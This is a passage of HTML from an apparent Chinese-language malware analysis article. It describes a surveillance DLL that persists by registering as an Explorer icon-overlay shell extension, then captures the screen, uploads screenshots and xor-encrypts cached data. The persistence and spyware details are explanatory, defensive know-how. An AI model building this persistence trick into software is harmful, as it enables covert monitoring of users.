mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.1）导出函数功能</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">监控程序的导出函数DllRegisterServer利用shell扩展实现持久化。首先将自身注册为COM 组件，并利用注册表“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\  StealthOverlay(StealthOverlay前有两个空格，保证优先加载)”将该组件注册为图标叠加处理器，随后使用SHChangeNotify刷新扩展，无需重启即可生效，自动被 explorer.exe 加载，并在系统启动后自动加载该DLL，实现持久驻留，这也是WinUpdateService程序守护explorer.exe进程的原因。该持久化技术在Vault 7泄露中有提及[1]。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023893" data-ratio="0.41040462427745666" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=cb094a41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl34tq6fUlpTCP89ex0eRiaZLqvZF5BPPgLRKIgCXCe4fzzz8Ohub01eg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图16 持久化技术</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023894" data-ratio="0.4820809248554913" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=16db7b38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlTP8pXwEwxUjia2j6hc7SkwxlZOnZfKoh0noibjxlBicrZAIsQ3EuCGCLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图17 注册表中的具体示例</span></span></p><p><span leaf=""><img data-imgfileid="100023895" class="rich_pages wxw-img" data-ratio="0.5364161849710982" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=0b76b953&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl7g7f6MmmkTlrmIHmKBJw5yrEMXib4XbMaUBa47V7icMRqe2dY31flDSA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图18 Vault 7泄露提及shell扩展实现持久化</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">导出函数DllUnregisterServer则实现取消服务功能。不过在取消服务时并未添加空格，可能是编程疏漏。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023896" data-ratio="0.28439306358381505" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=36c4cdae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlgrXaDibuVwa86apKkA1fglxDMepFiaDcictBpG0PpdqiaNwCpkraR4wcjQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图19 取消服务</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2）监控功能</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在监控功能中，样本会检验当前进程是否是explorer.exe，通过创建两个线程实现主要功能。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023897" data-ratio="0.5872832369942197" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=2e2fba6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlybgV7PlcTJ4q80PDKfWjXRjb68ek9ia6uMe0dmyEDLKq0Sib7JNeqj1g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图20 检验进程</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023898" data-ratio="0.34797687861271676" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=fa5506e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl457d4I2ianJ5Y56ke3QmIEO9rM8T8bgxRseug7D9dZiaIaFsdPrOTn2Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图21 创建两个线程</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1）</span><span leaf="">线程1-监控线程</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">线程1包含三部分主要功能。</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.1）</span><span leaf="">功能1-上传数据线程</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">首先会建立C:\\Users\\Public\\Uploader.log和C:\\Users\\Public\\Uploader_Errors.log，分别代表行为日志和错误日志。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023899" data-ratio="0.44277456647398844" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=b974d5db&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlmSFXV1auCCA8YuRDxZXwfiaQQjYNH7snjcy7JCXfianicj3ugDmdIBiaHA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图22 写入日志</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">随后创建Upload worker线程。启动上传功能。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023900" data-ratio="0.3872832369942196" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=836017ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlOJAYO8oVRZeyxh6ITGnUYIYU0bqogxwnqATvkQhdO9reA3mHgETMbw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图23 Upload worker线程示例</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Upload worker线程主要将屏幕捕获数据发送到上文设置的服务器地址，从URL来看，该监控软件疑似处于测试阶段。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023901" data-ratio="0.5121387283236994" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=5b309750&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGliaKGImsAIrCBTJSNV6OjQ3omkcR5ly2p1Xn0DibuRrVYSltUtHs1jcOw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图24 上传数据</span></span></p><p><span leaf=""><img data-imgfileid="100023902" class="rich_pages wxw-img" data-ratio="0.8104046242774566" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=896383c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl59CN5Apd74419siaMJRFBQD4LrUZIbasEnFRur6LF56kY7jMZxFlhEg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图25 上传的屏幕截图示例</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">如果不能连接服务器地址或上传失败，则使用xor加密，将数据保存到C:\ProgramData\Windows\WMI\\Temp\目录。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023903" data-ratio="0.35953757225433525" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=08ff3227&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlW88gf24ZDPN4kvYreuJWBge0wyGgpGvL7VKxdDHmliaMBFGtCNP2mpg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图26 加密保存数据</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.2）</span><span leaf="">功能2-屏幕捕获</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">功能2会创建3个线程执行主要功能。</span></span></p><div><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.2.1）</span><span leaf="">线程(1)-屏幕捕获线程</span></span></strong></span></p></div><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">线程(1)首先通过判断是否锁屏、用户输入时间以及显示器亮度判断当前系统状态，只有系统使用时才会执行后续功能，否则进入休眠状态。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023904" data-ratio="0.44277456647398844" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=1777586d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlRmnjUzcFuH3cFRDzV1ibNQpNc6wXxbibibB5xygqSFZdFst9CKWTib7bHA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023905" data-ratio="0.2878612716763006" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=196e3dbf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlL3ibFJl0F7WSGDrC0icUAj8C9jqsZGyvZuaGGz6q65kEuRib9Kp0sqiaCw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图27 判断系统状态</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在非休眠情况下，则进行屏幕内容监控，在屏幕帧发生变化时截图。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023906" data-ratio="0.47630057803468207" data-w="865" data-type="png" 